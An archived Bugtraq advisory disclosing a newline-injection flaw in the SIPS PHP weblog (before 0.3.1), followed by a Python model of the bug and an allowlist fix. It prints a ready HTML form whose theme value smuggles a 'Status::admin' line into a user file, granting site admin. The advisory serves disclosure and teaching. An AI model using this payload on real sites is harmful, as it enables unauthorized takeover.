Bugtraq mailing list archives

SIPS - vulnerable to anyone gaining admin access.


From: "b0iler _" <b0iler () hotmail com>
Date: Mon, 11 Feb 2002 23:13:11 -0700

#!/exploit/by/b0iler
# sips - http://sourceforge.net/projects/sips/
# versions lower than 0.3.1

Taken from freshmeat: "About: SIPS is an integrated Weblog and link-indexing system written in PHP. It is aimed at those with access to databaseless, PHP-enabled Web servers who want to run a Weblog site like Slashdot and/or a simple link index like Yahoo!."

OK, this one took a while to find since the code is long, but at least it was fairly easy to read. The script works much like phpnuke or slashcode; SIPS stands for Simple Internet Publishing System. The problem that I found was that when a user selects a theme to use, it is written into their database file. Then when a user goes to use admin.php, it just checks if the password for the user is correct and if they have the value Status equal to admin in their database. So I did a little playing around and got a theme to do a linebreak and write Status::admin onto the end of the user's database. This makes the user an admin of the script, giving them complete control over the site.

The key to securing this code is to filter all input, even if you think it won't be changed by the user: it can be. Also, checking to make sure the theme exists might be good. To exploit this we just need to change the theme page to something like this:

<form action="http://www.site.com/sips/htdocs/preferences.php" method="post">
<input type="hidden" name="op" value="theme">
<input type="hidden" name="action" value="settheme">
<select name="themename">
<!-- the linebreak inside the option value becomes a new Key::value line in the user file -->
<option value="default
Status::admin
">Exploited</option>
</select>
<input type="submit" value="Set Theme">
</form>

Here we submit a theme with the value of:

default        (linebreak)
Status::admin  (linebreak; SIPS chops the theme input here)

This will change an account from something like this:

bash-2.03$ cat user
Password::660120d6fbc1sn241be39290636b2942
Email::b0iler () hotmail com
Theme::default
Timezone::Greenwich Mean

to something like this:

bash-2.03$ cat user
Password::660120d6fbc1sn241be39290636b2942
Email::b0iler () hotmail com
Timezone::Greenwich Mean
Theme::default
Status::admin

The Status::admin line lets you use http://www.site.com/sips/htdocs/admin/index.php, which will give you total control over SIPS (pretty much the whole site).

The author was contacted on 2/1/02 and replied the same day. The author updated SIPS to version 0.3.1 on 2/8/02 and wrote a very nice page detailing the problem and possible solutions: http://sips.sourceforge.net/adminvul.html

-http://b0iler.advknowledge.net
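The flaw above is a record-injection bug in a flat-file "Key::value" store: the theme name is written into the user's file verbatim, so a linebreak in it adds a new line that the admin check later trusts. The following is an added illustration, not code from SIPS or from the post: a small Python model of that store with the vulnerable theme update beside a hardened one that only accepts an installed theme name. The function names, the KNOWN_THEMES set and the sample record are assumptions made for this example; the record format and the payload are the ones shown in the post.

```python
"""Model of the SIPS (< 0.3.1) flat-file account injection.

Added example, not SIPS's own code. SIPS keeps each user as a text file of
"Key::value" lines; preferences.php writes the chosen theme into that file
unfiltered, and admin/index.php honours a "Status::admin" line.
"""

# Constructed sample user record in the format shown in the post.
SAMPLE_USER = """Password::660120d6fbc1sn241be39290636b2942
Email::b0iler () hotmail com
Theme::default
Timezone::Greenwich Mean
"""

# Assumption: the themes actually installed on the site.
KNOWN_THEMES = {"default", "blue"}

# The payload from the post: a valid theme, a linebreak, then a forged line.
PAYLOAD = "default\nStatus::admin"


def parse_user(text):
    """Parse 'Key::value' lines into a dict.

    Every line is split on the first '::', so a forged 'Status::admin' line
    that was smuggled in through another field is read like any other.
    """
    record = {}
    for line in text.splitlines():
        if "::" in line:
            key, _, value = line.partition("::")
            record[key] = value
    return record


def serialize_user(record):
    """Write the record back as one 'Key::value' line per field."""
    return "".join(f"{key}::{value}\n" for key, value in record.items())


def set_theme_vulnerable(text, theme):
    """Mirror of the flaw: the submitted theme is stored without filtering,
    so a value containing a linebreak yields an extra line in the file."""
    record = parse_user(text)
    record["Theme"] = theme
    return serialize_user(record)


def set_theme_fixed(text, theme):
    """Hardened update: allow only an installed theme name (the 'check the
    theme exists' fix). Returns None when the value is rejected.

    An allowlist is preferable to stripping newlines, since any other
    delimiter the file format relies on is rejected as well.
    """
    if theme not in KNOWN_THEMES:
        return None
    record = parse_user(text)
    record["Theme"] = theme
    return serialize_user(record)


def is_admin(text):
    """The admin.php check as described: Status must equal 'admin'."""
    return parse_user(text).get("Status") == "admin"


if __name__ == "__main__":
    pwned = set_theme_vulnerable(SAMPLE_USER, PAYLOAD)
    print(pwned)
    print("vulnerable path grants admin:", is_admin(pwned))
    print("fixed path accepts payload:", set_theme_fixed(SAMPLE_USER, PAYLOAD) is not None)
```

Running the module prints the rewritten record with the injected Status::admin line and shows that the same submission is refused by the allowlisted update.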



